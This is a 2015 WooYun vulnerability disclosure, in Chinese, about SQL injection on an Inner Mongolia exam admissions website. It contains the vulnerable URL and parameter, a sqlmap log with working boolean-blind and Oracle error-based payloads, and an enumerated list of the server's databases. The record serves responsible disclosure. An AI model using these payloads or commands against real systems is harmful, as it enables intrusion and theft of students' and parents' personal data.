漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0103536
漏洞标题:内蒙古招生考试信息网sql injection导致信息泄露
相关厂商:cncert国家互联网应急中心
漏洞作者: 蓝色的微笑^.^
提交时间:2015-03-26 11:45
修复时间:2015-05-14 11:20
公开时间:2015-05-14 11:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开
简要描述:
sql injection导致信息泄露
详细说明:
分站注入:
http://zxks.nm.zsks.cn/zkweb/zk_kkzykc.jsp?zydm=020106
漏洞证明:
root@Hacker~# Sqlmap -u http://zxks.nm.zsks.cn/zkweb/zk_kkzykc.jsp?zydm=020106
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:51:43
[20:51:43] [INFO] testing connection to the target url
[20:51:43] [INFO] testing if the url is stable, wait a few seconds
[20:51:45] [INFO] url is stable
[20:51:45] [INFO] testing if GET parameter 'zydm' is dynamic
[20:51:45] [INFO] confirming that GET parameter 'zydm' is dynamic
[20:51:45] [INFO] GET parameter 'zydm' is dynamic
[20:51:45] [INFO] heuristic test shows that GET parameter 'zydm' might be inject
able (possible DBMS: Oracle)
[20:51:45] [INFO] testing for SQL injection on GET parameter 'zydm'
[20:51:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:51:46] [INFO] GET parameter 'zydm' is 'AND boolean-based blind - WHERE or HA
VING clause' injectable
[20:51:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[20:51:46] [INFO] GET parameter 'zydm' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[20:51:46] [INFO] testing 'Oracle AND time-based blind'
[20:51:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:51:46] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[20:51:47] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[20:51:48] [INFO] target url appears to have 21 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[20:51:59] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
GET parameter 'zydm' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 104 HTTP(s) req
uests:
---
Place: GET
Parameter: zydm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zydm=020106' AND 8641=8641 AND 'VRWf'='VRWf
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: zydm=020106' AND 1988=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(1
16)||CHR(121)||CHR(119)||CHR(58)||(SELECT (CASE WHEN (1988=1988) THEN 1 ELSE 0 E
ND) FROM DUAL)||CHR(58)||CHR(100)||CHR(105)||CHR(100)||CHR(58)||CHR(62))) FROM D
UAL) AND 'bVGO'='bVGO
---
[20:52:32] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[20:52:32] [INFO] fetched data logged to text files under 'D:\SQLMAP~1.3\B
in\output\zxks.nm.zsks.cn'
[*] shutting down at 20:52:32
-----------yD的分割线------------------------------------------------
available databases [35]:
[*] BSEN
[*] CET 全国大学英语等级考试
[*] CF
[*] EC_JXX
[*] GSZK 自考
[*] HRF
[*] JZG教师资格
[*] KCGL(xx)管理
[*] KSZXOA考试中心OA
[*] LIQ
[*] LZY
[*] NCRE 全国计算机等级考试
[*] PETS 全国英语等级考试
[*] QHL
[*] SECUREDB
[*] SHD
[*] SLT
[*] SLT8
[*] SYS
[*] SYSTEM
[*] XJZC 学籍注册
[*] YJS(研究生)
[*] YJS2013(2013研究生)
[*] YJSPKC
[*] ZBJS自治农村特岗教师
[*] ZGL招生管理
[*] ZHONGZHAO(中专招生)
[*] ZZLK
[*] ZZY
----------------YD分割线----------------------------------------------
修复方案:
参数过滤。。。危害挺大的 父母的各种信息都有
版权声明:转载请注明来源 蓝色的微笑^.^@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-03-30 11:19
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给内蒙古分中心,由其后续协调网站管理单位处置。
最新状态:
暂无